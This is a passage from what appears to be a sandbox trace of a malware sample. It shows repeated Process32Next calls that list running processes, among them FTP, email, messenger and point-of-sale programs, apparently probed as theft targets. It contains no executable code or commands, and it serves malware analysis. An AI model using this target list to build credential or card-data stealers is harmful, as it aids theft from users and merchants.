cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.528] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.529] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.530] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.530] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.531] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.531] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.532] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.533] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.534] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.535] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.535] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.536] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.537] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.537] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.538] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.539] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.540] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.540] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.541] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.542] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.542] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.543] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.543] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.544] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.545] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.545] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.546] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.547] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.547] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.548] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.549] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.627] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.628] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.629] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0060.629] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0060.630] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0060.631] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0060.631] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0060.632] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0060.633] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0060.633] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0060.635] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0060.636] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0060.636] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0060.637] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0060.638] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0060.639] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0060.640] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0060.641] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0060.643] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0060.644] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0060.645] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0060.646] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0060.647] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0060.648] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0060.649] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0060.650] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0060.651] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0060.652] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0060.652] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0060.653] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0060.654] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0060.655] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0060.656] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0060.657] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0060.657] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0060.658] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0060.659] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0060.660] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0060.661] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0060.661] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0060.662] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0060.663] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0060.664] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0060.664] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0060.665] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0060.666] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0060.667] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0060.667] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.668] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.669] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.669] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.670] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.671] Process32Next (in: hSnapshot=0x17c, 